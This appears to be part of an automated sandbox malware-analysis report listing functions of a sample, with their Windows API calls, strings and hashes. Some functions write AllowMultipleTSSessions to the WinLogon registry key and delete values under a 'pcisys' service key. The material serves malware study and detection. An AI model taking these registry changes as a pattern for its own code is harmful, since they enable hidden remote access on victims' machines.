                                                                                          • API String ID: 145871493-545709139
                                                                                          • Opcode ID: 3a4b236cb48376f508c38ed4b458c1881f7092457fa75596103347ffe0755064
                                                                                          • Instruction ID: 544929a8cbb1e389a607ec9f5ca7eb9fe692f705050414ad61daaab4254b54e0
                                                                                          • Opcode Fuzzy Hash: 3a4b236cb48376f508c38ed4b458c1881f7092457fa75596103347ffe0755064
                                                                                          • Instruction Fuzzy Hash: E2F0EC71605A220FD3318F79AC55BEE39E7EFD2760B465525F425D31E0C724898096A2
                                                                                          Function 005D5030 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\WinLogon,00000000,0002001F,?), ref: 005D5052
                                                                                          • RegSetValueExW.ADVAPI32(00000000,AllowMultipleTSSessions,00000000,00000004,00000000,00000004), ref: 005D5083
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005D508D
                                                                                          Strings
                                                                                          • AllowMultipleTSSessions, xrefs: 005D506D
                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\WinLogon, xrefs: 005D5041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenValue
                                                                                          • String ID: AllowMultipleTSSessions$Software\Microsoft\Windows NT\CurrentVersion\WinLogon
                                                                                          • API String ID: 779948276-1159474132
                                                                                          • Opcode ID: 0e0b8b96aabe773f035c5c79c3548bd1496a0bf0469720e77a99d8b5a7a09832
                                                                                          • Instruction ID: e524f7e1f058a9c5f2047f2a3c398ef02cb71777fde663c115a37986df2962bf
                                                                                          • Opcode Fuzzy Hash: 0e0b8b96aabe773f035c5c79c3548bd1496a0bf0469720e77a99d8b5a7a09832
                                                                                          • Instruction Fuzzy Hash: 9AF03674A40308FFEB20DF94DC49FDD7BB9E708705F104059BA04A62C1D7B15A449BA5
                                                                                          Function 005B42D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005B42D9
                                                                                          • SendMessageW.USER32(?,0000045B,?,00000000), ref: 005B430D
                                                                                          • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 005B431C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                          • API String ID: 2326795674-1196874063
                                                                                          • Opcode ID: d2bf5ad3f6c4980f9af2d5fdc0cbcbdfaf7ccac68bfaa2ac56fdaec5b3fb1c84
                                                                                          • Instruction ID: 0caf308d53ca09c03e07732143990b3cbfb3645487614392514bc451d608fca0
                                                                                          • Opcode Fuzzy Hash: d2bf5ad3f6c4980f9af2d5fdc0cbcbdfaf7ccac68bfaa2ac56fdaec5b3fb1c84
                                                                                          • Instruction Fuzzy Hash: 55E0D83638061437E6202A916C06FDB3B4DDBC5F21F098021FB04BA0C1D6A0B50049FD
                                                                                          Function 005AE360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27sleepthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • ExitThread.KERNEL32 ref: 005AE387
                                                                                          • Sleep.KERNEL32(00000064), ref: 005AE3A2
                                                                                          • EnumWindows.USER32(Function_0001DA50,00000000), ref: 005AE3BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$EnumExitLocalSleepThreadTimeWindowswvsprintf
                                                                                          • String ID: Kill Thread$StartThread
                                                                                          • API String ID: 4280549098-2688637858
                                                                                          • Opcode ID: 7fe992676c12b759263745d0c2a42a5273a48060d800e29965898d50fb26fd5e
                                                                                          • Instruction ID: 34e3a0afb67e6f6aba826adf9fb6f629fa8515eb11faf1f059dd09bd42de6650
                                                                                          • Opcode Fuzzy Hash: 7fe992676c12b759263745d0c2a42a5273a48060d800e29965898d50fb26fd5e
                                                                                          • Instruction Fuzzy Hash: D7F03034945301AADB31A744AC1FBDD3EA2BB42754F1D6827E607132E287B12495CA63
                                                                                          Function 005AEA10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,System\CurrentControlSet\Services\pcisys,00000000,00020006,?), ref: 005AEA29
                                                                                          • RegDeleteValueW.ADVAPI32(?,DisplayPath), ref: 005AEA3C
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEA46
                                                                                          Strings
                                                                                          • System\CurrentControlSet\Services\pcisys, xrefs: 005AEA1F
                                                                                          • DisplayPath, xrefs: 005AEA36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteOpenValue
                                                                                          • String ID: DisplayPath$System\CurrentControlSet\Services\pcisys
                                                                                          • API String ID: 849931509-2555881177
                                                                                          • Opcode ID: 02b04df0de1173fd8c80b1f126276c580967b5a3564e8df3dbafffcbbfb89580
                                                                                          • Instruction ID: 28b3c491e43d7a2990db7c465439a824b9b1471ff8ca869672c0b34d63b3d759
                                                                                          • Opcode Fuzzy Hash: 02b04df0de1173fd8c80b1f126276c580967b5a3564e8df3dbafffcbbfb89580
                                                                                          • Instruction Fuzzy Hash: 8FE08C79B40308BBD720CBA0AD4AFEA777EEB4CB06F14414DBF09A2140D670EA009A60
                                                                                          Function 005C4C30 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 005C4C8B
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 005C4CAC
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C4CD8
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005C4CF9
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 005C4D1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWide$CreateModuleNameQueryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 892964244-0
                                                                                          • Opcode ID: 350f76a0343ecd9b162ccfaad9f3d55f73e5227c7c41a52d6e4c50812eafd373
                                                                                          • Instruction ID: 31716ff5e7af2b797d2c86714dbccfa8b9761ced5379c0916487a20700533d71
                                                                                          • Opcode Fuzzy Hash: 350f76a0343ecd9b162ccfaad9f3d55f73e5227c7c41a52d6e4c50812eafd373
                                                                                          • Instruction Fuzzy Hash: 7D31A771640214AFEB30CB51CC55FEAB7B9EB85B10F244188B719AB1C0DA71AE00CFA5
                                                                                          Function 005C4050 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Beep.KERNEL32(00000000,00000000), ref: 005C4119
                                                                                          • MessageBeep.USER32(00000000), ref: 005C412B
                                                                                          • MessageBeep.USER32(-00000010), ref: 005C413F
                                                                                          • PlaySoundW.WINMM(0063B7E8,00000000,00020001), ref: 005C4155
                                                                                          • MessageBeep.USER32(?), ref: 005C4161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Beep$Message$PlaySound
                                                                                          • String ID:
                                                                                          • API String ID: 3864068446-0
                                                                                          • Opcode ID: edcb5ea98f520df0755955e6583265b72cd666c847306dbedb42d2da99fc6bca
                                                                                          • Instruction ID: 3cd9662243278b13b88e8e38fa43c134af55858435f8fe1a7b181eef0e7f7338
                                                                                          • Opcode Fuzzy Hash: edcb5ea98f520df0755955e6583265b72cd666c847306dbedb42d2da99fc6bca
                                                                                          • Instruction Fuzzy Hash: 69214D7654021196EB1017A5BC19FFB3AA9FFD07A2F085039FE9DD2181F725C890DAB2
                                                                                          Function 005C4910 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 005C4930
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C4943
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005C4963
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 005C4990
                                                                                          • VerQueryValueW.VERSION(?,0061A1FC,?,?,?,?,00000000,00000000), ref: 005C49D1
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$HeapInfoModuleVersion$AllocateErrorFreeHandleLastNameQuerySizeValue
                                                                                          • String ID:
                                                                                          • API String ID: 1506823308-0
                                                                                          • Opcode ID: 387d03ba81b8f43027669985c1a35c5a95e356d2e4da24837fd917f97e8424c1
                                                                                          • Instruction ID: 1a80da98e4608e928a826a50580f894689f31135ecf4730f0d7c1591a3250939
                                                                                          • Opcode Fuzzy Hash: 387d03ba81b8f43027669985c1a35c5a95e356d2e4da24837fd917f97e8424c1
                                                                                          • Instruction Fuzzy Hash: 9021957190021D9BCB14DF65CC89FDAB7F8FF58310F044599E90997241E6709E40CF91
                                                                                          Function 005B8529 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$FreeUnlock$DeleteObject
                                                                                          • String ID:
                                                                                          • API String ID: 1228591530-0
                                                                                          • Opcode ID: 81b6fc5ed035f4dc979b8670eec24ed2a9be2fc84ce947a47e49ed5063105aaa
                                                                                          • Instruction ID: 94ca475e2f739c29d4a9297abf6a90cf595956c94bbd6eb6cb5308324bd512f5
                                                                                          • Opcode Fuzzy Hash: 81b6fc5ed035f4dc979b8670eec24ed2a9be2fc84ce947a47e49ed5063105aaa
                                                                                          • Instruction Fuzzy Hash: 1E318171D04259ABCF25DF60D8C49EEBFBABF95314F199089E84467342DB30AD41CBA1
                                                                                          Function 005B6AB0 Relevance: 7.6, APIs: 5, Instructions: 77memorywindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000042), ref: 005B6AE5
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B6AFA
                                                                                          • CreatePalette.GDI32(00000000), ref: 005B6B5C
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B6B68
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B6B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$AllocCreateFreeLockPaletteUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3539721555-0
                                                                                          • Opcode ID: bca580c42c92e96bdb0a765cb8f703f31dc89397b7ce81cb8f6d0457856110fd
                                                                                          • Instruction ID: d5dac39f230bf1d6d4b13c63920066c321cc6c9434125e7c3fd9f5a6ec72e0ed
                                                                                          • Opcode Fuzzy Hash: bca580c42c92e96bdb0a765cb8f703f31dc89397b7ce81cb8f6d0457856110fd
                                                                                          • Instruction Fuzzy Hash: C92148314053909AC7118B7888687EAFFB4FF16311F0881EEE88887251D63AA944C7B1
                                                                                          Function 005A6E70 Relevance: 7.6, APIs: 5, Instructions: 76memorycomCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0061B478,00000000,00000001,0061B488,?), ref: 005A6E92
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 005A6EB9
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 005A6ED2
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005A6F0A
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005A6F0D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree$CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 1867060851-0
                                                                                          • Opcode ID: 6a0d24385ab386c2150ea23dda54a0e19ea32c4f37b517225498089f13a8ac09
                                                                                          • Instruction ID: 435d1d7d009b0bd03c658fc8b7862fd912ae442d15d29dc286148df153b0a44b
                                                                                          • Opcode Fuzzy Hash: 6a0d24385ab386c2150ea23dda54a0e19ea32c4f37b517225498089f13a8ac09
                                                                                          • Instruction Fuzzy Hash: 49213BB5600104AFDB00DFA9DC85E9ABBEDFF8A314B1481A5F808DB355D670EE01CBA0
                                                                                          Function 005AB0E0 Relevance: 7.6, APIs: 5, Instructions: 76registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 005AB10B
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005AB14B
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB1A3
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005AB1AB
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 005AB196
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2095303065-0
                                                                                          • Opcode ID: 11b1a03e81197a4bb9a28175eaeabfe2a676e151d91bf71619f3f28b27d40605
                                                                                          • Instruction ID: a5371933706850eebfcb936c2597a278481a17a311ba6c4292c61a2a21f54160
                                                                                          • Opcode Fuzzy Hash: 11b1a03e81197a4bb9a28175eaeabfe2a676e151d91bf71619f3f28b27d40605
                                                                                          • Instruction Fuzzy Hash: 462121B590021DABEB20DB54DC58FFB77BDEB48704F008199F91996152DB70AE448FB0
                                                                                          Function 005FA705 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005FA73C
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005FA748
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA750
                                                                                          • GetTickCount.KERNEL32 ref: 005FA758
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 005FA764
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1445889803-0
                                                                                          • Opcode ID: 92e18bc28f9b411dc402c37cb1addb572da5e9c6a61d90a00d94a6685b4d7015
                                                                                          • Instruction ID: e58a0c9a9e16b431d45986c78abe20c82eb787c880d1f095537970ed396595f6
                                                                                          • Opcode Fuzzy Hash: 92e18bc28f9b411dc402c37cb1addb572da5e9c6a61d90a00d94a6685b4d7015
                                                                                          • Instruction Fuzzy Hash: 7011E972D043249FCB119BF8DC489EABBF5FB48355F560911F515E7110DA349D008BD2
                                                                                          Function 005B46E0 Relevance: 7.5, APIs: 5, Instructions: 38serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 005B46ED
                                                                                          • OpenServiceW.ADVAPI32(00000000,?,00000004), ref: 005B4701
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005B4712
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005B471F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005B4726
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 2623946379-0
                                                                                          • Opcode ID: 5ac6d513462cc5d8b60b7abf93100b8b9a4d5920da8994cf5fbdf6c9ed9208d3
                                                                                          • Instruction ID: e80ff3068e4b26048730bc03673bd394b954a017545dc01be0eec0d78ba5599a
                                                                                          • Opcode Fuzzy Hash: 5ac6d513462cc5d8b60b7abf93100b8b9a4d5920da8994cf5fbdf6c9ed9208d3
                                                                                          • Instruction Fuzzy Hash: 0DF0A736641520BBE7211B24AC59FEB3B7DEB8BB62F08900AFA15C7240DF71D801CA70
